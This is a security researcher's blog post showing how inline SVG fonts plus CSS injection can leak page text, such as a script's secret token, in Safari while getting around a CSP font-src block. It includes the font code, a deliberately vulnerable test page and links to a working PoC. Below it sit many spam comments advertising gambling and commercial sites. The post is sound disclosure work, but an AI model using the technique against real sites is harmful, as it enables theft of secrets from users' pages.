This post will show that the SVG fonts and CSS can be used for reading the page's text contents.
There are several known ways to read the page's text contents with CSS. The known techniques are well covered in the following article by Juan Manuel Fernández:
CSS Injection Primitives :: DoomsDay Vault
These techniques can be useful to attackers in some situations, for example, when the input is sanitized and only limitted HTML tags can be used, or JavaScript cannot be used due to the Content Security Policy (CSP) restrictions.
The technique I want to introduce today is one such technique. The basic idea is the same as the following font ligature trick by Michał Bentkowski.
Stealing Data in Great style – How to Use CSS to Attack Web Application. - research.securitum.com
It is the mostly same but I've never seen any article mentioning this and I thought it is worth mentioning because the technique I'll explain here can be useful in the specific situation such as when Michał's technique cannot be used due to the CSP's restriction, so I'm writing this.
Well, in my Japanese blog post, around here, I explained Michał's trick in detail in my words but the person who is reading this can read English, so please read his article first :)
Okay, you've read it, right? As you learned from his article, he used WOFF fonts convereted from SVG fonts. In my trick, I use SVG fonts without converting it. Michał said "browsers have stopped supporting the SVG format in fonts (hence the need to use the WOFF format)" but in fact, Safari still supports it. After all, the trick I am about to introduce is just a replacement of his trick with SVG fonts. But still, the reason I want to dare to introduce this trick is that SVG fonts can be used even when loading fonts is blocked by the CSP's restriction. That is, SVG fonts allow reading text contents even on pages where the CSP prohibits loading fonts. This is because SVG fonts can not only be loaded from URLs, like WOFF fonts, but also all font's components can be defined with in-line without loading from URLs.
Let's see how Michał's trick can be replaced.
In his trick, the WOFF font is loaded via <style>'s @font-face.
<style>
@font-face {
font-family: "hack";
src: url(http://192.168.13.37:3001/font/%22/0)
}
[...]
</style>
This style can be replaced with the following inline SVG.
<svg>
<defs>
<font horiz-adv-x="0">
<font-face font-family="hack" units-per-em="1000"></font-face>
<glyph unicode=""0" horiz-adv-x="99999" d="M1 0z"></glyph>
<glyph unicode="1" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="2" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="3" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="4" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="5" horiz-adv-x="0" d="M1 0z"></glyph>
[...]
</font>
</defs>
</svg>
Now, if the font-family property is set to "hack" via CSS, the SVG font is applied to the target's text even outside the SVG. This is not blocked by CSP even if the font-src 'none' is set. (Note that to observe the leaked data, this trick uses the background image request as well as Michał's trick, so at least, the host which can observe the request must be allowed in the img-src directive.)
I'll show you the PoC. When there is a vulnerable page like the following,
https://vulnerabledoma.in/svg_font/xss.html?xss=%3Cs%3EXSS%3Cscript%3Ealert(1)%3C/script%3E
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Security-Policy" content="default-src 'none';script-src 'nonce-random';style-src 'unsafe-inline';img-src https:">
</head>
<body>
<script id="leakme" nonce="random">
const secret = "573ba8e9bfd0abd3d69d8395db582a9e";
</script>
<script nonce="random">
const params = (new URL(document.location)).searchParams;
const xss = params.get('xss');
if(xss){
document.write(xss);
}
</script>
</body>
</html>
I'll show you SVG fonts can leak the "secret" variable.
You can reproduce it by opening the following URL with Safari and clicking the "Go" button.
PoC: https://l0.cm/svg_font/poc.php
The all code can be found in: https://github.com/masatokinugawa/css-exfiltration-svg-font
If the PoC works correctly, like the following video, multiple new windows will open and after waiting for a while, the secret variable's string will be displayed little by little, like "573b ..." on the page having the "Go" button.
It's almost the same as Michał's PoC, except that it uses SVG fonts, but there are a few changes. In his PoC, he loads the target page into the iframe but in my PoC, I used window.open() instead. This is because Safari blocks all third party cookies by default now and I thought the attack using the iframe is not so realistic PoC for Safari. Also, I changed the way to pass the data. Here again, due to the third party cookie blocking, the cookie can not be set when the background image is loaded, so I used the session id with the URL parameter instead.
By the way, if you're used to Chrome, you might wonder why multiple new windows are opened by one click. This is because Safari have the popup blocker but there is no limit to the number of windows that can be opened by one click. Thanks to this, it is possible to efficiently try to read the data using multiple windows.
That's it. Thanks for reading! I hope this post helps you out.
Hey I just released a similar project: https://github.com/OliverBrotchie/CSS-Fingerprint
ReplyDeletei like your article. it can help me
ReplyDeleteRC airplane
Though many companies make the claim of offering the best service in the market, we let that decision rest upon you.
ReplyDeleteThe information you have provided is very valuable to us.
토토사이트
Simply desire to say your article is as amazing. The clearness on your post is simply spectacular and that i could assume you are a professional on this subject.
ReplyDelete토토사이트
Wonderful website. Plenty of helpful information here. 경마사이트
ReplyDeleteThanks a lot for sharing this amazing knowledge with us. This site is fantastic. I always find great knowledge from it.
ReplyDeleteVisit us for printed jute bags.
I was very pleased to find this web-site. I wanted to thanks for your time for this wonderful read!! I definitely enjoying every little bit of it and I have you bookmarked to check out new stuff your blog post.
ReplyDeleteIf you are looking for customised promotional umbrella online. Get connected with us for more details.
very nice put up, i certainly love this website, keep on it. 바카라카지노슬롯 It touched me a lot. I would love to hear your opinion on my site. Please come to the site I run once and leave a comment. Thank you.
ReplyDeletefdjftj
I think other site proprietors should take this web site as an model, very clean and great user genial style and design, as well as the content. You're an expert in this topic! chatroulette italiana
ReplyDeleteHere we are Providing Best Template Solution at free of Cast For all kind of Business and Examples, YOu just need to Find to your desire Topic and Download the family-tree-templates
ReplyDeletelive draw hk
ReplyDeletelive draw sydney
forum syair hk
forum syair sydney
Hi! This post could not be written any better! Reading this post reminds me of my previous room mate! He always kept talking about this. I will forward this post to him. Pretty sure he will have a good read. Many thanks for sharing!
ReplyDeleteTravel Agency in Dubai
Dubai Travel Agency
안전하게 에볼 플레이 먹튀검증 gogo
ReplyDeleteGlad to visit this one. Thank you for this. www.hardwoodflooringcolumbusohio.com/
ReplyDeleteAmazing Blog! I have go through all the content of this blog.This is really helpful and informative for me.If you are looking to buy an online Contract Law Assignment Writing Service turnout to best assignment service for all the academic work.
ReplyDeleteI really want to agree with you.
ReplyDeletethejacketzone
I'm Glad to visit again your post. Keep posting.
ReplyDeletebully dog
Nice Blog!! Thanks for sharing this useful information. Virtual Public Speaker For Hire!!
ReplyDeleteData exfiltration via CSS + SVG font represents a sophisticated yet concerning avenue for cybersecurity threats. While the focus often gravitates towards conventional vulnerabilities, understanding these complex modes of breach is crucial. Implementing robust security measures, akin to the precision of embroidery digitizing services, becomes imperative. Safeguarding data demands a multi-layered approach, acknowledging these intricate digital nuances to fortify against evolving cyber risks.
ReplyDeleteYour innovative approach to highlighting potential security risks is commendable. Civil Protective Order In New Jersey Your PoC is not only well-documented but also effectively demonstrates the vulnerability using SVG fonts. The detailed comparison with Michał's PoC adds valuable insights, and your adaptation to Safari's cookie policies showcases your problem-solving skills. Kudos for contributing to the community's understanding of browser security nuances! Driving Without A License New Jersey
ReplyDeleteThe intellectual rigor and ethical compass that guide your content creation are evident, making your work a trusted source of insight and inspiration.
ReplyDeletemarble console in Ajman
iqos terea heets vozol puff çeşitleri
ReplyDeletehttps://www.etiltarimsal.com/
In this blog, you’ll find a wealth of information covering a wide range of security topics, from the latest cyber threats and vulnerabilities to best practices in information security. Masato breaks down complex security concepts into understandable and actionable advice, making it accessible whether you're a seasoned IT professional or a concerned user looking to enhance your online safety.
ReplyDeletemanassas divorce lawyers
Luxury6688
ReplyDeleteThe number one largest online game website, apply for membership now, click on the link.
Thank you for taking the time to publish this information very useful! Check our best motor oil 10w30.
ReplyDeleteYour kindness and generosity have really changed my life. My sincerest gratitude to you for everything. I also want to discuss the finest workforce management software
ReplyDeleteThe concept of data exfiltration via CSS and SVG fonts is both fascinating and alarming. It’s incredible how attackers can exploit seemingly harmless design elements like fonts and stylesheets to steal sensitive data. This highlights the importance of securing every aspect of web development, even those that may seem benign. It’s a good reminder for developers to stay vigilant and regularly update their security protocols. On a lighter note, if you're in the creative field, tools like embroidery digitizing software offer a secure and fun way to transform designs into beautiful embroidered creations without worrying about data vulnerabilities!
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteInteresting technique! However, it highlights the importance of security measures to prevent data exfiltration. On a more positive note, if you're looking for ways to reward your team for their hard work in keeping your company's data secure, consider gifting them with luxury corporate gifts or corporate gift hampers . It's a great way to show appreciation and boost morale!
ReplyDeletenaza website online the best in the world
ReplyDelete